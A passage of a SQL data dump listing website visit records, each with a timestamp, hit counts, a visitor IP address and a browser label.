.13.146','other'),(453824,1570382850,1,1,0,0,'66.249.66.136','chrome'),(453825,1570383378,1,1,0,0,'157.55.39.107','other'),(453826,1570383663,1,1,0,0,'207.46.13.146','other'),(453827,1570383751,2,2,0,0,'8.29.198.25','other'),(453828,1570384751,1,1,0,0,'66.249.66.88','chrome'),(453829,1570384811,2,2,0,0,'66.249.66.134','chrome'),(453830,1570384887,1,1,0,0,'207.46.13.110','other'),(453831,1570385673,1,1,0,0,'207.46.13.112','other'),(453832,1570386321,1,1,0,0,'5.45.207.44','other'),(453833,1570386686,1,1,0,0,'37.9.113.97','other'),(453834,1570386791,1,1,0,0,'141.8.142.115','other'),(453835,1570386795,1,1,0,0,'207.46.13.146','other'),(453836,1570387014,2,2,0,0,'66.249.66.134','chrome'),(453837,1570387079,1,1,0,0,'157.55.39.107','other'),(453838,1570387274,1,1,0,0,'66.249.66.136','chrome'),(453839,1570388127,1,1,0,0,'207.46.13.166','other'),(453840,1570388341,1,1,0,0,'66.249.66.88','chrome'),(453841,1570388350,3,3,0,0,'66.249.66.132','chrome'),(453842,1570389224,1,1,0,0,'141.8.132.37','other'),(453843,1570389714,1,1,0,0,'157.55.39.107','other'),(453844,1570389955,1,1,0,0,'66.249.66.134','chrome'),(453845,1570390308,1,1,0,0,'207.46.13.146','other'),(453846,1570390324,1,1,0,0,'157.55.39.65','other'),(453847,1570390366,1,1,0,0,'66.249.66.136','chrome'),(453848,1570390393,1,1,0,0,'207.46.13.166','other'),(453849,1570391044,1,1,0,0,'66.249.66.132','chrome'),(453850,1570391452,1,1,0,0,'207.46.13.146','other'),(453851,1570391695,1,1,0,0,'141.8.142.115','other'),(453852,1570392002,1,1,0,0,'66.249.66.136','chrome'),(453853,1570392228,1,1,0,0,'157.55.39.107','other'),(453854,1570392354,1,1,0,0,'207.46.13.166','other'),(453855,1570392437,1,1,0,0,'95.108.213.3','other'),(453856,1570392477,1,1,0,0,'95.108.213.61','other'),(453857,1570392615,1,1,0,0,'207.46.13.146','other'),(453858,1570392656,1,1,0,0,'66.249.66.88','chrome'),(453859,1570392776,1,1,0,0,'91.209.11.236','other'),(453860,1570393279,2,2,0,0,'66.249.66.132','chrome'),(453861,1570393808,1,1,0,0,'66.249.66.136','chrome'),(453862,1570394578,2,2,0,0,'66.249.66.132','chrome'),(453863,1570394594,1,1,0,0,'8.29.198.25','other'),(453864,1570394732,1,1,0,0,'8.29.198.27','other'),(453865,1570395243,1,1,0,0,'157.55.39.107','other'),(453866,1570395502,1,1,0,0,'66.249.66.134','chrome'),(453867,1570396000,1,1,0,0,'66.249.66.136','chrome'),(453868,1570396083,1,1,0,0,'207.46.13.146','other'),(453869,1570396876,1,1,0,0,'207.46.13.166','other'),(453870,1570397013,1,1,0,0,'157.55.39.107','other'),(453871,1570397161,1,1,0,0,'66.249.66.86','chrome'),(453872,1570397266,2,2,0,0,'88.99.2.203','other'),(453873,1570397268,1,1,0,0,'136.243.70.68','other'),(453874,1570397920,1,1,0,0,'157.55.39.107','other'),(453875,1570398039,1,1,0,0,'207.46.13.146','other'),(453876,1570398620,3,3,0,0,'66.249.66.134','chrome'),(453877,1570398976,1,1,0,0,'66.249.66.136','chrome'),(453878,1570399240,1,1,0,0,'207.46.13.166','other'),(453879,1570400211,1,1,0,0,'157.55.39.107','other'),(453880,1570400737,1,1,0,0,'157.55.39.65','other'),(453881,1570400990,1,1,0,0,'66.249.66.86','chrome'),(453882,1570401291,1,1,0,0,'66.249.66.132','chrome'),(453883,1570401859,2,2,0,0,'207.46.13.146','other'),(453884,1570402351,1,1,0,0,'66.249.66.134','chrome'),(453885,1570402652,1,1,0,0,'157.55.39.65','other'),(453886,1570404064,1,1,0,0,'52.162.161.148','other'),(453887,1570404373,1,1,0,0,'66.249.66.136','chrome'),(453888,1570404825,1,1,0,0,'66.249.66.132','chrome'),(453889,1570405426,2,2,0,0,'8.29.198.25','other'),(453890,1570406114,1,1,0,0,'62.205.134.182','other'),(453891,1570406260,1,1,0,0,'66.249.66.136','chrome'),(453892,1570406265,1,1,0,0,'207.46.13.33','other'),(453893,1570407158,2,2,0,0,'66.249.66.134','chrome'),(453894,1570407278,1,1,0,0,'66.249.66.132','chrome'),(453895,1570408071,2,2,0,0,'66.249.66.134','chrome'),(453896,1570409215,1,1,0,0,'66.249.66.132','chrome'),(453897,1570409776,1,1,0,0,'207.46.13.17','other'),(453898,1570410744,1,1,0,0,'207.46.13.24','other'),(453899,1570411097,1,1,0,0,'66.249.66.88','chrome'),(453900,1570411193,1,1,0,0,'66.249.66.136','chrome'),(453901,1570411581,1,1,0,0,'141.8.142.177','other'),(453902,1570411636,1,1,0,0,'141.8.142.128','other'),(453903,1570412507,1,1,0,0,'66.249.66.86','chrome'),(453904,1570413362,1,1,0,0,'66.249.66.134','chrome'),(453905,1570414902,1,1,0,0,'37.9.113.6','other'),(453906,1570416283,1,1,0,0,'8.29.198.27','other'),(453907,1570416426,1,1,0,0,'8.29.198.26','other'),(453908,1570416466,1,1,0,0,'207.46.13.17','other'),(453909,1570416701,1,1,0,0,'37.9.113.97','other'),(453910,1570416759,1,1,0,0,'141.8.188.38','other'),(453911,1570418276,1,1,0,0,'157.55.39.106','other'),(453912,1570419886,1,1,0,0,'66.249.66.86','chrome'),(453913,1570421307,1,1,0,0,'123.20.120.123','chrome'),(453914,1570421401,1,1,0,0,'178.154.171.7','other'),(453915,1570422540,1,1,0,0,'37.9.113.202','other'),(453916,1570423535,1,1,0,0,'62.205.134.182','other'),(453917,1570423558,1,1,0,0,'207.46.13.24','other'),(453918,1570423690,1,1,0,0,'157.55.39.106','other'),(453919,1570424416,1,1,0,0,'37.9.113.200','other'),(453920,1570424530,3,3,0,0,'207.46.13.24','other'),(453921,1570425456,1,1,0,0,'141.8.142.132','other'),(453922,1570426692,1,1,0,0,'157.55.39.22','other'),(453923,1570427139,1,1,0,0,'8.29.198.27','other'),(453924,1570427254,1,1,0,0,'8.29.198.26','other'),(453925,1570427695,1,1,0,0,'141.8.142.177','other'),(453926,1570428854,1,1,0,0,'178.154.171.66','other'),(453927,1570429218,1,1,0,0,'78.154.176.14','chrome'),(453928,1570430013,1,1,0,0,'137.30.124.130','other'),(453929,1570430598,1,1,0,0,'91.196.178.174','chrome'),(453930,1570430731,1,1,0,0,'207.46.13.124','other'),(453931,1570430948,1,1,0,0,'178.154.200.27','other'),(453932,1570431022,1,1,0,0,'13.66.139.0','other'),(453933,1570431305,1,1,0,0,'78.154.176.14','chrome'),(453934,1570432086,1,1,0,0,'141.8.132.19','other'),(453935,1570432846,1,1,0,0,'85.21.233.180','other'),(453936,1570433076,1,1,0,0,'157.55.39.22','other'),(453937,1570433080,2,2,0,0,'207.46.13.24','other'),(453938,1570434452,1,1,0,0,'195.230.119.58','chrome'),(453939,1570435041,1,1,0,0,'46.219.3.35','chrome'),(453940,1570436189,1,1,0,0,'91.196.178.176','chrome'),(453941,1570436229,1,1,0,0,'37.9.113.39','other'),(453942,1570436267,1,1,0,0,'5.45.207.43','other'),(453943,1570436419,1,1,0,0,'91.196.178.65','chrome'),(453944,1570437076,1,1,0,0,'95.133.212.104','chrome'),(453945,1570437310,1,1,0,0,'66.249.66.136','chrome'),(453946,1570437989,2,2,0,0,'8.29.198.25','other'),(453947,1570438101,1,1,0,0,'87.250.224.104','other'),(453948,1570438236,1,1,0,0,'141.8.132.19','other'),(453949,1570439374,1,1,0,0,'81.163.112.98','chrome'),(453950,1570439613,1,1,0,0,'157.55.39.22','other'),(453951,1570440158,1,1,0,0,'91.196.121.11','chrome'),(453952,1570441480,1,1,0,0,'5.255.253.8','other'),(453953,1570441538,2,2,0,0,'91.209.11.236','other'),(453954,1570441899,1,1,0,0,'66.249.66.88','chrome'),(453955,1570442607,2,2,0,0,'91.209.11.236','other'),(453956,1570443546,1,1,0,0,'87.250.224.104','other'),(453957,1570443611,1,1,0,0,'5.45.207.43','other'),(453958,1570445128,1,1,0,0,'95.133.212.104','chrome'),(453959,1570445394,1,1,0,0,'37.73.176.225','chrome'),(453960,1570446448,1,1,0,0,'91.196.178.174','chrome'),(453961,1570446716,1,1,0,0,'157.55.39.22','other'),(453962,1570447993,1,1,0,0,'37.9.113.177','other'),(453963,1570448174,1,1,0,0,'95.108.213.3','other'),(453964,1570448463,1,1,0,0,'176.113.209.243','firefox'),(453965,1570448766,1,1,0,0,'66.249.66.132','chrome'),(453966,1570448826,1,1,0,0,'8.29.198.26','other'),(453967,1570448969,1,1,0,0,'8.29.198.25','other'),(453968,1570448997,1,1,0,0,'91.196.178.67','firefox'),(453969,1570449821,1,1,0,0,'46.200.42.135','chrome'),(453970,1570449964,1,1,0,0,'193.19.254.75','chrome'),(453971,1570450047,1,1,0,0,'91.196.178.88','chrome'),(453972,1570450225,1,1,0,0,'193.106.30.99','chrome'),(453973,1570450470,1,1,0,0,'91.196.178.77','chrome'),(453974,1570450507,1,1,0,0,'46.211.125.214','chrome'),(453975,1570450759,1,1,0,0,'109.74.154.72','chrome'),(453976,1570450819,1,1,0,0,'95.108.181.103','other'),(453977,1570451008,1,1,0,0,'91.221.211.2','chrome'),(453978,1570452120,1,1,0,0,'141.8.183.18','other'),(453979,1570452228,1,1,0,0,'66.249.66.86','chrome'),(453980,1570452985,1,1,0,0,'157.55.39.200','other'),(453981,1570453079,1,1,0,0,'141.8.142.177','other'),(453982,1570453379,1,1,0,0,'207.46.13.219','other'),(453983,1570454173,1,1,0,0,'109.251.94.29','chrome'),(453984,1570454311,1,1,0,0,'167.71.246.118','other'),(453985,1570454409,2,2,0,0,'157.55.39.82','other'),(453986,1570455075,1,1,0,0,'91.196.178.88','chrome'),(453987,1570456447,1,1,0,0,'46.211.132.190','chrome'),(453988,1570457406,1,1,0,0,'157.55.39.160','other'),(453989,1570458433,1,1,0,0,'178.154.200.13','other'),(453990,1570458982,1,1,0,0,'91.196.178.189','chrome'),(453991,1570459090,1,1,0,0,'91.209.11.236','other'),(453992,1570459677,1,1,0,0,'8.29.198.26','other'),(453993,1570459833,1,1,0,0,'8.29.198.25','other'),(453994,1570459881,1,1,0,0,'46.211.98.121','chrome'),(453995,1570459932,1,1,0,0,'91.196.178.73','firefox'),(453996,1570460674,1,1,0,0,'141.8.132.37','other'),(453997,1570460773,1,1,0,0,'141.8.132.19','other'),(453998,1570461599,1,1,0,0,'207.46.13.18','other'),(453999,1570461727,1,1,0,0,'157.55.39.218','other'),(454000,1570461818,1,1,0,0,'178.154.200.33','other'),(454001,1570462370,1,1,0,0,'91.196.178.177','chrome'),(454002,1570462462,1,1,0,0,'207.46.13.160','other'),(454003,1570463007,1,1,0,0,'141.8.183.18','other'),(454004,1570463169,1,1,0,0,'157.55.39.218','other'),(454005,1570463610,1,1,0,0,'207.46.13.160','other'),(454006,1570463973,1,1,0,0,'91.196.178.185','chrome'),(454007,1570464134,1,1,0,0,'178.154.200.13','other'),(454008,1570464251,1,1,0,0,'5.45.207.43','other'),(454009,1570464631,1,1,0,0,'77.222.143.222','msie'),(454010,1570465301,1,1,0,0,'37.57.218.190','firefox'),(454011,1570465412,1,1,0,0,'207.46.13.18','other'),(454012,1570465474,1,1,0,0,'207.46.13.160','other'),(454013,1570466317,1,1,0,0,'46.211.121.184','chrome'),(454014,1570466374,1,1,0,0,'66.249.66.134','chrome'),(454015,1570466399,1,1,0,0,'66.249.66.132','chrome'),(454016,1570467205,2,2,0,0,'207.46.13.160','other'),(454017,1570467513,1,1,0,0,'95.108.213.55','other'),(454018,1570467656,1,1,0,0,'66.249.66.86','chrome'),(454019,1570468146,1,1,0,0,'66.249.66.136','chrome'),(454020,1570468387,1,1,0,0,'157.55.39.218','other'),(454021,1570469020,1,1,0,0,'91.196.178.82','chrome'),(454022,1570469341,1,1,0,0,'5.45.207.43','other'),(454023,1570469669,1,1,0,0,'141.8.188.18','other'),(454024,1570470534,1,0,1,0,'66.249.66.134',''),(454025,1570470544,1,1,0,0,'8.29.198.27','other'),(454026,1570470644,1,1,0,0,'141.8.132.37','other'),(454027,1570470699,1,1,0,0,'8.29.198.26','other'),(454028,1570471107,2,2,0,0,'66.249.66.134','chrome'),(454029,1570471625,2,2,0,0,'207.46.13.18','other'),(454030,1570472687,2,2,0,0,'207.46.13.18','other'),(454031,1570475345,1,1,0,0,'66.249.66.86','chrome'),(454032,1570475982,1,1,0,0,'66.249.66.136','chrome'),(454033,1570476025,1,1,0,0,'66.249.66.132','chrome'),(454034,1570477627,1,1,0,0,'66.249.66.136','chrome'),(454035,1570477863,1,1,0,0,'157.55.39.115','other'),(454036,1570478542,1,1,0,0,'91.209.11.236','other'),(454037,1570479026,2,2,0,0,'95.213.141.126','opera'),(454038,1570479309,1,1,0,0,'141.8.132.37','other'),(454039,1570479851,1,1,0,0,'87.250.224.90','other'),(454040,1570479983,1,1,0,0,'37.9.113.39','other'),(454041,1570481388,1,1,0,0,'8.29.198.27','other'),(454042,1570481544,1,1,0,0,'8.29.198.26','other'),(454043,1570482137,2,2,0,0,'69.58.178.59','other'),(454044,1570485649,1,1,0,0,'5.45.207.49','other'),(454045,1570485660,1,1,0,0,'66.249.66.88','chrome'),(454046,1570485752,1,1,0,0,'66.249.66.134','chrome'),(454047,1570486724,1,1,0,0,'157.55.39.45','other'),(454048,1570486910,1,1,0,0,'141.8.142.164','other'),(454049,1570488150,1,1,0,0,'66.249.66.132','chrome'),(454050,1570488152,1,1,0,0,'141.8.188.38','other'),(454051,1570488334,1,1,0,0,'109.248.149.23','chrome'),(454052,1570488646,1,1,0,0,'157.55.39.153','other'),(454053,1570489984,1,1,0,0,'66.249.66.134','chrome'),(454054,1570489987,1,1,0,0,'66.249.66.136','chrome'),(454055,1570490871,1,1,0,0,'141.8.188.20','other'),(454056,1570491014,1,1,0,0,'46.48.13.161','other'),(454057,1570492231,2,2,0,0,'8.29.198.25','other'),(454058,1570492296,1,1,0,0,'178.154.200.71','other'),(454059,1570492319,1,1,0,0,'178.154.171.66','other'),(454060,1570492441,1,1,0,0,'141.8.188.18','other'),(454061,1570492514,1,1,0,0,'62.205.134.182','other'),(454062,1570492843,1,1,0,0,'66.249.66.136','chrome'),(454063,1570494826,1,1,0,0,'157.55.39.61','other'),(454064,1570498446,1,1,0,0,'141.8.188.20','other'),(454065,1570498661,1,1,0,0,'52.41.158.167','other'),(454066,1570499152,2,2,0,0,'157.55.39.199','other'),(454067,1570499534,1,1,0,0,'66.249.66.136','chrome'),(454068,1570499827,1,1,0,0,'141.8.188.25','other'),(454069,1570502023,1,1,0,0,'157.55.39.200','other'),(454070,1570502571,1,1,0,0,'141.8.183.18','other'),(454071,1570502574,1,1,0,0,'66.249.66.132','chrome'),(454072,1570503090,1,1,0,0,'8.29.198.26','other'),(454073,1570503228,1,1,0,0,'8.29.198.27','other'),(454074,1570503443,1,1,0,0,'91.218.115.233','chrome'),(454075,1570504275,1,1,0,0,'157.55.39.211','other'),(454076,1570504289,1,1,0,0,'157.55.39.200','other'),(454077,1570505120,1,1,0,0,'37.9.113.10','other'),(454078,1570507320,1,1,0,0,'66.249.66.86','chrome'),(454079,1570508712,1,1,0,0,'5.45.207.49','other'),(454080,1570509928,1,1,0,0,'62.205.134.182','other'),(454081,1570510358,2,2,0,0,'66.249.66.132','chrome'),(454082,1570512484,1,1,0,0,'157.55.39.200','other'),(454083,1570513404,1,1,0,0,'141.8.183.18','other'),(454084,1570513528,1,1,0,0,'141.8.132.12','other'),(454085,1570513940,2,2,0,0,'8.29.198.25','other'),(454086,1570515623,1,1,0,0,'91.196.178.86','chrome'),(454087,1570517875,1,1,0,0,'37.9.113.202','other'),(454088,1570517906,1,1,0,0,'91.196.178.81','chrome'),(454089,1570518013,1,1,0,0,'13.66.139.0','other'),(454090,1570518285,1,1,0,0,'37.9.113.163','other'),(454091,1570518900,1,1,0,0,'91.196.178.186','chrome'),(454092,1570518980,1,1,0,0,'66.249.66.132','chrome'),(454093,1570520097,1,1,0,0,'167.71.179.234','other'),(454094,1570520588,1,1,0,0,'157.245.127.22','other'),(454095,1570520642,1,1,0,0,'5.45.207.44','other'),(454096,1570520889,1,1,0,0,'95.132.50.163','firefox'),(454097,1570521187,1,1,0,0,'91.196.178.69','chrome'),(454098,1570522286,1,1,0,0,'178.92.211.177','chrome'),(454099,1570523361,1,1,0,0,'141.8.188.18','other'),(454100,1570524014,1,1,0,0,'91.196.178.91','chrome'),(454101,1570524344,1,1,0,0,'157.55.39.200','other'),(454102,1570524796,1,1,0,0,'8.29.198.25','other'),(454103,1570524944,1,1,0,0,'8.29.198.27','other'),(454104,1570525014,2,2,0,0,'93.171.5.121','chrome'),(454105,1570525210,1,1,0,0,'66.249.66.136','chrome'),(454106,1570525845,1,1,0,0,'178.154.200.13','other'),(454107,1570526376,1,1,0,0,'91.196.178.86','chrome'),(454108,1570526805,1,1,0,0,'66.249.66.132','chrome'),(454109,1570527112,2,2,0,0,'207.46.13.21','other'),(454110,1570527244,1,1,0,0,'207.46.13.127','other'),(454111,1570528439,1,1,0,0,'157.55.39.199','other'),(454112,1570528453,1,1,0,0,'141.8.142.119','other'),(454113,1570528457,1,1,0,0,'141.8.142.161','other'),(454114,1570528459,1,1,0,0,'207.46.13.127','other'),(454115,1570529256,1,1,0,0,'207.46.13.192','other'),(454116,1570529352,1,1,0,0,'66.249.66.136','chrome'),(454117,1570529492,1,1,0,0,'194.44.36.30','chrome'),(454118,1570529748,1,1,0,0,'141.8.188.18','other'),(454119,1570530132,1,1,0,0,'66.249.66.134','chrome'),(454120,1570530766,1,1,0,0,'91.196.178.91','chrome'),(454121,1570531558,1,1,0,0,'141.8.132.37','other'),(454122,1570535666,1,1,0,0,'8.29.198.27','other'),(454123,1570535791,1,1,0,0,'8.29.198.25','other'),(454124,1570536064,2,2,0,0,'66.249.66.136','chrome'),(454125,1570536278,1,1,0,0,'66.249.66.134','chrome'),(454126,1570537091,1,1,0,0,'66.249.66.132','chrome'),(454127,1570537120,1,1,0,0,'176.111.33.18','firefox'),(454128,1570537506,1,1,0,0,'81.133.241.97','other'),(454129,1570537859,1,1,0,0,'109.74.154.72','chrome'),(454130,1570538741,1,1,0,0,'178.154.200.71','other'),(454131,1570538811,2,0,2,0,'207.46.13.252',''),(454132,1570539236,3,3,0,0,'66.249.66.132','chrome'),(454133,1570539358,1,1,0,0,'5.255.253.8','other'),(454134,1570539376,2,2,0,0,'66.249.66.134','chrome'),(454135,1570539444,1,1,0,0,'141.8.188.66','other'),(454136,1570540683,1,1,0,0,'207.46.13.252','other'),(454137,1570541263,1,1,0,0,'66.249.66.132','chrome'),(454138,1570541287,1,1,0,0,'87.250.224.104','other'),(454139,1570541311,1,1,0,0,'141.8.142.177','other'),(454140,1570541402,1,1,0,0,'128.69.229.177','chrome'),(454141,1570542757,3,3,0,0,'66.249.66.134','chrome'),(454142,1570543314,1,1,0,0,'62.216.43.242','chrome'),(454143,1570543715,1,1,0,0,'157.55.39.235','other'),(454144,1570544320,1,1,0,0,'193.151.56.200','chrome'),(454145,1570544499,1,1,0,0,'91.196.178.94','firefox'),(454146,1570544658,1,1,0,0,'5.45.207.49','other'),(454147,1570544923,1,1,0,0,'34.222.205.100','chrome'),(454148,1570545059,1,1,0,0,'141.8.132.19','other'),(454149,1570545235,1,1,0,0,'66.249.66.134','chrome'),(454150,1570545845,1,1,0,0,'66.249.66.136','chrome'),(454151,1570545917,1,1,0,0,'141.8.142.115','other'),(454152,1570546074,1,1,0,0,'141.8.132.2','other'),(454153,1570546414,1,1,0,0,'66.249.66.86','chrome'),(454154,1570546529,1,1,0,0,'195.69.221.54','chrome'),(454155,1570546552,1,1,0,0,'8.29.198.26','other'),(454156,1570546682,1,1,0,0,'8.29.198.27','other'),(454157,1570547503,1,1,0,0,'207.46.13.108','other'),(454158,1570547534,1,1,0,0,'54.188.25.107','chrome'),(454159,1570547645,1,1,0,0,'77.222.143.222','msie'),(454160,1570547988,1,1,0,0,'66.249.66.132','chrome'),(454161,1570548274,2,2,0,0,'66.249.66.134','chrome'),(454162,1570548427,1,1,0,0,'47.108.24.224','chrome'),(454163,1570548448,1,1,0,0,'66.249.66.88','chrome'),(454164,1570550228,1,1,0,0,'37.9.113.177','other'),(454165,1570550276,1,1,0,0,'66.249.66.132','chrome'),(454166,1570550492,1,1,0,0,'66.249.66.136','chrome'),(454167,1570551041,1,1,0,0,'66.249.66.134','chrome'),(454168,1570551670,3,3,0,0,'66.249.66.132','chrome'),(454169,1570552067,1,1,0,0,'66.249.66.136','chrome'),(454170,1570552125,1,1,0,0,'87.250.224.118','other'),(454171,1570552451,1,1,0,0,'207.46.13.23','other'),(454172,1570552825,2,2,0,0,'66.249.66.134','chrome'),(454173,1570553415,1,1,0,0,'35.241.228.238','chrome'),(454174,1570554242,1,1,0,0,'37.9.113.142','other'),(454175,1570555079,1,0,1,0,'66.249.66.132',''),(454176,1570555083,1,1,0,0,'207.46.13.108','other'),(454177,1570556016,1,1,0,0,'157.55.39.168','other'),(454178,1570556135,3,0,3,0,'66.249.66.132',''),(454179,1570556415,1,1,0,0,'95.216.15.49','other'),(454180,1570557039,1,1,0,0,'66.249.66.136','chrome'),(454181,1570557088,1,1,0,0,'141.8.142.177','other'),(454182,1570557279,2,2,0,0,'66.249.66.132','chrome'),(454183,1570557405,2,2,0,0,'8.29.198.27','other'),(454184,1570558857,3,3,0,0,'66.249.66.132','chrome'),(454185,1570559004,1,1,0,0,'66.249.66.88','chrome'),(454186,1570559023,1,1,0,0,'66.249.66.136','chrome'),(454187,1570559909,1,1,0,0,'37.9.113.142','other'),(454188,1570560136,2,2,0,0,'66.249.66.136','chrome'),(454189,1570560898,2,2,0,0,'157.55.39.172','other'),(454190,1570560908,4,4,0,0,'157.55.39.168','other'),(454191,1570560934,1,1,0,0,'37.9.113.177','other'),(454192,1570562219,1,1,0,0,'157.55.39.105','other'),(454193,1570562335,1,1,0,0,'37.9.113.33','other'),(454194,1570562426,1,1,0,0,'93.72.36.251','other'),(454195,1570563547,1,1,0,0,'37.9.113.33','other'),(454196,1570564303,2,2,0,0,'157.55.39.105','other'),(454197,1570564596,1,1,0,0,'131.159.24.47','other'),(454198,1570564883,1,1,0,0,'157.55.39.172','other'),(454199,1570565577,1,1,0,0,'66.249.64.16','chrome'),(454200,1570565750,2,2,0,0,'66.249.64.66','chrome'),(454201,1570566674,1,1,0,0,'66.249.64.66','chrome'),(454202,1570566743,1,1,0,0,'157.55.39.105','other'),(454203,1570566884,1,1,0,0,'207.46.13.7','other'),(454204,1570567668,1,1,0,0,'178.157.91.22','other'),(454205,1570568063,1,1,0,0,'137.226.113.34','firefox'),(454206,1570568258,1,1,0,0,'8.29.198.25','other'),(454207,1570568394,1,1,0,0,'8.29.198.26','other'),(454208,1570568465,2,2,0,0,'157.55.39.245','other'),(454209,1570568615,1,1,0,0,'66.249.64.66','chrome'),(454210,1570568716,1,1,0,0,'66.249.64.94','chrome'),(454211,1570569092,1,1,0,0,'66.249.64.16','chrome'),(454212,1570569189,1,1,0,0,'213.180.203.37','other'),(454213,1570569501,1,1,0,0,'37.9.113.163','other'),(454214,1570569712,1,1,0,0,'66.249.64.69','chrome'),(454215,1570569854,1,1,0,0,'66.249.64.66','chrome'),(454216,1570570024,1,1,0,0,'66.249.64.16','chrome'),(454217,1570570476,1,1,0,0,'157.55.39.245','other'),(454218,1570570545,1,1,0,0,'66.249.64.94','chrome'),(454219,1570572362,1,1,0,0,'137.226.113.21','firefox'),(454220,1570573959,1,1,0,0,'66.249.64.94','chrome'),(454221,1570576905,4,4,0,0,'66.249.64.94','chrome'),(454222,1570577332,4,4,0,0,'66.249.64.69','chrome'),(454223,1570578622,1,1,0,0,'66.249.64.69','chrome'),(454224,1570578635,1,1,0,0,'93.145.17.218','msie'),(454225,1570578835,2,2,0,0,'66.249.64.94','chrome'),(454226,1570578915,1,1,0,0,'62.205.134.182','other'),(454227,1570579112,1,1,0,0,'8.29.198.27','other'),(454228,1570579185,1,1,0,0,'5.255.253.8','other'),(454229,1570579242,1,1,0,0,'8.29.198.25','other'),(454230,1570579445,1,1,0,0,'37.9.113.10','other'),(454231,1570580299,2,2,0,0,'66.249.64.16','chrome'),(454232,1570580329,2,2,0,0,'66.249.64.94','chrome'),(454233,1570581233,1,1,0,0,'66.249.64.69','chrome'),(454234,1570581514,1,1,0,0,'193.106.30.99','chrome'),(454235,1570581673,3,3,0,0,'207.46.13.10','other'),(454236,1570581749,1,1,0,0,'188.165.218.34','firefox'),(454238,1570582641,1,1,0,0,'207.46.13.10','other'),(454239,1570583099,1,1,0,0,'141.8.142.44','other'),(454240,1570583316,1,1,0,0,'157.55.39.189','other'),(454241,1570583539,3,3,0,0,'66.249.64.69','chrome'),(454242,1570583856,1,1,0,0,'141.8.142.115','other'),(454243,1570584717,1,1,0,0,'157.55.39.245','other'),(454244,1570584790,1,1,0,0,'157.55.39.149','other'),(454245,1570584943,2,2,0,0,'207.46.13.203','other'),(454246,1570584952,1,1,0,0,'193.106.30.99','chrome'),(454247,1570585357,1,1,0,0,'157.55.39.189','other'),(454248,1570585499,1,1,0,0,'141.8.188.38','other'),(454249,1570585582,1,1,0,0,'66.249.64.94','chrome'),(454250,1570585798,2,2,0,0,'207.46.13.10','other'),(454251,1570586097,1,1,0,0,'207.46.13.34','other'),(454252,1570586612,1,1,0,0,'157.55.39.189','other'),(454253,1570586649,1,1,0,0,'66.249.64.94','chrome'),(454254,1570586675,1,1,0,0,'142.93.68.191','other'),(454255,1570586732,1,1,0,0,'209.97.156.200','other'),(454256,1570587766,1,1,0,0,'66.249.64.18','chrome'),(454257,1570588193,1,1,0,0,'66.249.64.66','chrome'),(454258,1570588416,1,1,0,0,'66.249.64.94','chrome'),(454259,1570589463,1,1,0,0,'66.249.64.69','chrome'),(454260,1570589493,2,2,0,0,'66.249.64.94','chrome'),(454261,1570589960,2,2,0,0,'8.29.198.26','other'),(454262,1570590098,1,1,0,0,'188.165.218.34','firefox'),(454263,1570590164,1,1,0,0,'66.249.64.16','chrome'),(454264,1570590194,1,1,0,0,'66.249.64.18','chrome'),(454265,1570590438,2,2,0,0,'66.249.64.94','chrome'),(454266,1570590661,1,1,0,0,'66.249.64.69','chrome'),(454267,1570590981,1,1,0,0,'207.46.13.138','other'),(454268,1570591139,2,2,0,0,'66.249.64.66','chrome'),(454269,1570591251,2,2,0,0,'66.249.64.18','chrome'),(454270,1570591260,2,2,0,0,'66.249.64.16','chrome'),(454271,1570592040,1,1,0,0,'199.127.56.236','chrome'),(454272,1570592064,1,1,0,0,'66.249.64.66','chrome'),(454273,1570592547,1,1,0,0,'141.8.188.20','other'),(454274,1570592856,1,1,0,0,'66.249.64.94','chrome'),(454275,1570593077,1,1,0,0,'207.46.13.138','other'),(454276,1570593085,1,1,0,0,'137.226.113.26','other'),(454277,1570593100,4,4,0,0,'66.249.64.69','chrome'),(454278,1570593663,1,1,0,0,'141.8.132.12','other'),(454279,1570594593,1,1,0,0,'66.249.64.66','chrome'),(454280,1570594764,1,1,0,0,'95.108.181.104','other'),(454281,1570594862,1,1,0,0,'87.250.224.118','other'),(454282,1570596365,1,1,0,0,'62.205.134.182','other'),(454283,1570597662,1,1,0,0,'66.249.64.18','chrome'),(454284,1570597981,2,2,0,0,'66.249.64.94','chrome'),(454285,1570598088,1,1,0,0,'66.249.64.69','chrome'),(454286,1570598098,1,1,0,0,'207.46.13.138','other'),(454287,1570598100,1,1,0,0,'66.249.64.66','chrome'),(454288,1570598713,1,1,0,0,'207.46.13.218','other'),(454289,1570598903,1,1,0,0,'188.165.218.34','firefox'),(454290,1570599071,1,1,0,0,'66.249.64.69','chrome'),(454291,1570599747,1,1,0,0,'91.196.178.179','firefox'),(454292,1570600026,1,1,0,0,'141.8.188.12','other'),(454293,1570600819,1,1,0,0,'207.46.13.217','other'),(454294,1570600822,1,1,0,0,'8.29.198.27','other'),(454295,1570600879,1,1,0,0,'141.8.183.18','other'),(454296,1570600937,1,1,0,0,'8.29.198.26','other'),(454297,1570601015,1,1,0,0,'66.249.64.16','chrome'),(454298,1570601036,1,1,0,0,'91.196.178.90','firefox'),(454299,1570601766,1,1,0,0,'66.249.64.18','chrome'),(454300,1570602025,3,3,0,0,'207.46.13.138','other'),(454301,1570602188,1,1,0,0,'91.196.178.86','chrome'),(454302,1570602223,1,1,0,0,'66.249.64.94','chrome'),(454303,1570602245,1,1,0,0,'141.8.142.177','other'),(454304,1570602620,1,1,0,0,'91.196.177.228','chrome'),(454305,1570602722,1,1,0,0,'91.196.178.90','firefox'),(454306,1570603566,1,1,0,0,'5.58.248.150','chrome'),(454307,1570603621,1,1,0,0,'207.46.13.218','other'),(454308,1570604360,3,3,0,0,'91.209.11.236','other'),(454309,1570604937,1,1,0,0,'141.8.132.19','other'),(454310,1570605444,1,1,0,0,'66.249.64.66','chrome'),(454311,1570605576,3,3,0,0,'66.249.64.94','chrome'),(454312,1570605764,1,1,0,0,'176.125.38.141','firefox'),(454313,1570605940,2,2,0,0,'91.209.11.236','other'),(454314,1570606065,2,2,0,0,'66.249.64.69','chrome'),(454315,1570606592,1,1,0,0,'66.249.64.66','chrome'),(454316,1570606668,1,1,0,0,'207.46.13.138','other'),(454317,1570606717,2,2,0,0,'207.46.13.208','other'),(454318,1570606884,1,1,0,0,'91.209.11.236','other'),(454319,1570606950,1,1,0,0,'77.74.177.113','chrome'),(454320,1570607063,1,1,0,0,'207.46.13.218','other'),(454321,1570607261,1,1,0,0,'188.165.218.34','firefox'),(454322,1570607476,1,1,0,0,'66.249.64.94','chrome'),(454323,1570607486,1,1,0,0,'66.249.64.18','chrome'),(454324,1570607674,1,1,0,0,'66.249.64.16','chrome'),(454325,1570608605,1,1,0,0,'77.74.177.113','chrome'),(454326,1570608915,1,1,0,0,'141.8.183.18','other'),